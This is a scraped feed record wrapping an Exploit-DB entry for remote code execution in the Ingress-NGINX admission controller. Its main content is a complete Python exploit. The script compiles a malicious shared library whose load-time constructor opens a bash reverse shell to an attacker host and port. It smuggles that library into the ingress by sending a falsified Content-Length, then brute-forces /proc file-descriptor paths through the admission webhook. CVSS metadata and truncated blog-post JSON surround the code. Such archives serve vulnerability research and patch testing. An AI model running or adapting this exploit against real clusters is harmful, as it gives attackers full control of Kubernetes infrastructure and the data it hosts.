{“lastseen”:”2026-02-04T13:28:43″,”description”:”Exploit Title: Ingress-NGINX Admission Controller v1.11.1 – FD Injection to RCE Date: 2025-10-07 Exploit Author: Beatriz Fresno Naumova Vendor Homepage: https:\/\/kubernetes.io Software Link: https:\/\/github.com\/kubernetes\/ingress-nginx Version: Affects…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”exploitdb”,”title”:”Ingress-NGINX Admission Controller v1.11.1 – FD Injection to RCE”,”source”:””,”references”:””,”id”:”EDB-ID:52475″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-1097″,”CVE-2025-1098″,”CVE-2025-1974″,”CVE-2025-24514″],”sourceData”:”# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 – FD Injection to RCE \\r\\n# Date: 2025-10-07\\r\\n# Exploit Author: Beatriz Fresno Naumova\\r\\n# Vendor Homepage: https:\/\/kubernetes.io\\r\\n# Software Link: https:\/\/github.com\/kubernetes\/ingress-nginx\\r\\n# Version: Affects v1.10.0 to v1.11.1 (potentially others)\\r\\n# Tested on: Ubuntu 22.04, RKE2 Kubernetes Cluster\\r\\n# CVE: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974\\r\\n\\r\\nimport os\\r\\nimport sys\\r\\nimport socket\\r\\nimport requests\\r\\nimport threading\\r\\nfrom urllib.parse import urlparse\\r\\nfrom concurrent.futures import ThreadPoolExecutor\\r\\nimport urllib3\\r\\n\\r\\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\r\\n\\r\\n# — Embedded malicious shared object template —\\r\\nMALICIOUS_C_TEMPLATE = \\”\\”\\”\\r\\n#include \\u003cstdlib.h\\u003e\\r\\n\\r\\n__attribute__((constructor))\\r\\nvoid run_on_load() {\\r\\n system(\\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/HOST\/PORT 0\\u003e\\u00261’\\”);\\r\\n}\\r\\n\\r\\nint bind(void *e, const char *id) {\\r\\n return 1;\\r\\n}\\r\\n\\r\\nvoid ENGINE_load_evil() {}\\r\\n\\r\\nint bind_engine() {\\r\\n return 1;\\r\\n}\\r\\n\\”\\”\\”\\r\\n\\r\\ndef compile_shared_library(host, port, output_file=\\”evil_engine.so\\”):\\r\\n c_code = MALICIOUS_C_TEMPLATE.replace(\\”HOST\\”, host).replace(\\”PORT\\”, str(port))\\r\\n\\r\\n with open(\\”evil_engine.c\\”, \\”w\\”) as f:\\r\\n f.write(c_code)\\r\\n\\r\\n print(\\”[*] Compiling malicious shared object…\\”)\\r\\n result = os.system(\\”gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto\\”)\\r\\n\\r\\n if result == 0:\\r\\n print(\\”[+] Shared object compiled successfully.\\”)\\r\\n return True\\r\\n else:\\r\\n print(\\”[!] Compilation failed. Is gcc installed?\\”)\\r\\n return False\\r\\n\\r\\n\\r\\ndef send_brute_request(admission_url, json_template, proc, fd):\\r\\n print(f\\”[*] Trying \/proc\/{proc}\/fd\/{fd}\\”)\\r\\n path = f\\”proc\/{proc}\/fd\/{fd}\\”\\r\\n payload = json_template.replace(\\”REPLACE\\”, path)\\r\\n\\r\\n headers = {\\”Content-Type\\”: \\”application\/json\\”}\\r\\n url = admission_url.rstrip(\\”\/\\”) + \\”\/admission\\”\\r\\n\\r\\n try:\\r\\n response = requests.post(url, data=payload, headers=headers, verify=False, timeout=5)\\r\\n print(f\\”[+] Response for \/proc\/{proc}\/fd\/{fd}: {response.status_code}\\”)\\r\\n except Exception as e:\\r\\n print(f\\”[!] Error on \/proc\/{proc}\/fd\/{fd}: {e}\\”)\\r\\n\\r\\n\\r\\ndef brute_force_admission(admission_url, json_file=\\”review.json\\”, max_proc=50, max_fd=30, max_workers=5):\\r\\n try:\\r\\n with open(json_file, \\”r\\”) as f:\\r\\n json_data = f.read()\\r\\n except FileNotFoundError:\\r\\n print(f\\”[!] Error: {json_file} not found.\\”)\\r\\n return\\r\\n\\r\\n print(\\”[*] Starting brute-force against the admission webhook…\\”)\\r\\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\\r\\n for proc in range(1, max_proc):\\r\\n for fd in range(3, max_fd):\\r\\n executor.submit(send_brute_request, admission_url, json_data, proc, fd)\\r\\n\\r\\n\\r\\ndef upload_shared_library(ingress_url, shared_object=\\”evil_engine.so\\”):\\r\\n try:\\r\\n with open(shared_object, \\”rb\\”) as f:\\r\\n evil_payload = f.read()\\r\\n except FileNotFoundError:\\r\\n print(f\\”[!] Error: {shared_object} not found.\\”)\\r\\n return\\r\\n\\r\\n parsed = urlparse(ingress_url)\\r\\n host = parsed.hostname\\r\\n port = parsed.port or 80\\r\\n path = parsed.path or \\”\/\\”\\r\\n\\r\\n try:\\r\\n sock = socket.create_connection((host, port))\\r\\n except Exception as e:\\r\\n print(f\\”[!] Failed to connect to {host}:{port}: {e}\\”)\\r\\n return\\r\\n\\r\\n fake_length = len(evil_payload) + 10\\r\\n headers = (\\r\\n f\\”POST {path} HTTP\/1.1\\\\r\\\\n\\”\\r\\n f\\”Host: {host}\\\\r\\\\n\\”\\r\\n f\\”User-Agent: qmx-ingress-exploiter\\\\r\\\\n\\”\\r\\n f\\”Content-Type: application\/octet-stream\\\\r\\\\n\\”\\r\\n f\\”Content-Length: {fake_length}\\\\r\\\\n\\”\\r\\n f\\”Connection: keep-alive\\\\r\\\\n\\\\r\\\\n\\”\\r\\n ).encode(\\”iso-8859-1\\”)\\r\\n\\r\\n print(\\”[*] Uploading malicious shared object to ingress…\\”)\\r\\n sock.sendall(headers + evil_payload)\\r\\n\\r\\n response = b\\”\\”\\r\\n while True:\\r\\n chunk = sock.recv(4096)\\r\\n if not chunk:\\r\\n break\\r\\n response += chunk\\r\\n\\r\\n print(\\”[*] Server response:\\\\n\\”)\\r\\n print(response.decode(errors=\\”ignore\\”))\\r\\n sock.close()\\r\\n\\r\\n\\r\\ndef main():\\r\\n if len(sys.argv) != 4:\\r\\n print(\\”Usage: python3 exploit.py \\u003cingress_url\\u003e \\u003cadmission_webhook_url\\u003e \\u003crev_host:port\\u003e\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n ingress_url = sys.argv[1]\\r\\n admission_url = sys.argv[2]\\r\\n rev_host_port = sys.argv[3]\\r\\n\\r\\n if ‘:’ not in rev_host_port:\\r\\n print(\\”[!] Invalid format for rev_host:port.\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n host, port = rev_host_port.split(\\”:\\”)\\r\\n\\r\\n if not compile_shared_library(host, port):\\r\\n sys.exit(1)\\r\\n\\r\\n # Send the malicious shared object and keep the connection open\\r\\n upload_thread = threading.Thread(target=upload_shared_library, args=(ingress_url,))\\r\\n upload_thread.start()\\r\\n\\r\\n # Simultaneously brute-force the admission webhook for valid file descriptors\\r\\n brute_force_admission(admission_url)\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52475″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52475″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T13:28:43″,”description”:”Exploit Title: Ingress-NGINX Admission Controller v1.11.1 – FD Injection to RCE Date: 2025-10-07 Exploit Author: Beatriz Fresno Naumova Vendor Homepage: https:\/\/kubernetes.io Software Link: https:\/\/github.com\/kubernetes\/ingress-nginx Version:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-38999","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n